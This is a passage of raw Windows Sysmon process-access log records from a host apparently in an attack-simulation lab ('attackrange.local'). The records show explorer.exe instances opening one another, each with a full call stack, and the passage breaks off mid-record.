16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241584Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241583Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241582Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241581Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241580Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241579Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241578Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241577Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241576Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241575Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241574Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241573Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241572Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241571Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241570Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241569Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241568Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241567Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241566Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002241565Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241564Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\